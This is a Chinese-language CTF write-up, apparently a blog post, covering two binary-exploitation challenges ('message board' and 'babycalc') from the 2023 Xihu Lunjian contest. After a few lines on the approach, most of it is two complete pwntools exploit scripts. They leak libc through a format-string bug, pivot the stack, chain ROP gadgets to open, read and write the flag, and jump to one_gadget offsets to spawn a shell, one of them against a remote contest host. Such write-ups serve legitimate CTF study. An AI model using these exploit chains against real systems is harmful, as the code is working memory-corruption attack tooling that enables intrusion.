message board

漏洞在这里：

保护：

没有canary和pie，libc版本是2.31

禁了execve，需要使用orw
思路与hgame2023_week1_pwn_orw基本一致（白夜牛逼）栈迁移orw，泄露libc的手法略有不同，这题存在一次格式化字符串漏洞用来泄露libc
对于fmtstr的题目一直不太熟悉，泄露libc尤为手生
通过这题再练一下，调试的时候看到**__libc_start_main+243**这个地址，可用于泄露__libc_start_main，同时__libc_start_main作为libc的一个符号可用于计算libc基址，接下来控制参数%p的偏移就可以回显出该地址，偷懒可以直接vmmap。

exp

from pwn import *

context.log_level = "debug"
context.terminal = ["konsole", "-e"]

p = process("./vuln")
#p = remote("tcp.cloud.dasctf.com", "27285")

elf = ELF("./vuln")
libc = ELF("./libc.so.6")

# pop rdi ; ret
pop_rdi = 0x0000000000401413
# leave ; ret
leave_ret = 0x00000000004012e1

vuln = 0x401378
bss  = 0x404080

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]

#gdb.attach(p)
p.sendafter(b"name:", b"%31$p")

p.recvuntil(b"0x")
libc_base = int(p.recv(12).decode(), 16) - 0x24083
success("libc_base = " + hex(libc_base))

open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
# 0x000000000002601f : pop rsi ; ret
pop_rsi = libc_base + 0x000000000002601f
# 0x0000000000142c92 : pop rdx ; ret
pop_rdx = libc_base + 0x0000000000142c92

payload  = b"a" * 0xB0
payload += p64(bss + 0x200)
payload += p64(vuln)

p.sendafter(b"DASCTF:", payload)

payload  = b"flag\x00\x00\x00\x00"     # 0x404160
payload += p64(pop_rdi)
payload += p64(0x4041d0)
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(open_addr)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(0x404700)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(read_addr)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi)
payload += p64(0x404700)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(write_addr)
payload  = payload.ljust(0xB0, b"a")
payload += p64(0x4041d0)
payload += p64(leave_ret)

# gdb.attach(p)
p.send(payload)

p.interactive()

babycalc

exp

from pwn import *
context.log_level = logging.DEBUG

# sh = process("./babycalc")
sh = remote("tcp.cloud.dasctf.com", "21539")
libc = ELF("./libc-2.23.so")

pop_rdi_ret = 0x0000000000400ca3
pop_rsi_r15_ret = 0x0000000000400ca1

payload = b"24"
payload = payload.ljust(0x20, b'\x00')
payload += p64(0xDEADBEEF) + p64(pop_rdi_ret) + p64(0x602018) + p64(0x4005D0) + p64(0x400C1B)
payload = payload.ljust(0x100 - 0x30, b'\x00')
payload += bytes([19,36,53,70,55,66,17,161,50,131,212,101,118,199,24,3])
payload = payload.ljust(0x100 - 4, b'\x00')
payload += p32(0x38)

print(len(payload))
print(payload)

# gdb.attach(sh)
sh.sendafter(b"number-", payload)

sh.recvuntil(b"good done\n")

libc_base = u64(sh.recv(6).ljust(8, b'\x00')) - libc.sym["puts"]
log.success("libc_base: " + hex(libc_base))

# gdb.attach(sh)

payload = b"24"
payload = payload.ljust(0x20, b'\x00')
payload += p64(0xDEADBEEF) + p64(pop_rdi_ret) + p64(0x602018) + p64(0x4005D0) + p64(0x400789)
payload = payload.ljust(0x100 - 0x30, b'\x00')
payload += bytes([19,36,53,70,55,66,17,161,50,131,212,101,118,199,24,3])
payload += p64(0) * 2 + p64(libc_base + 0xf1247)
payload = payload.ljust(0x100 - 4, b'\x00')
payload += p32(0x38)

sh.sendafter(b"number-", payload)

sh.interactive()

"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

2023西湖论剑部分pwn题WP

水平比较低只能理解两道题

message board

exp

babycalc

exp

特色标签

链友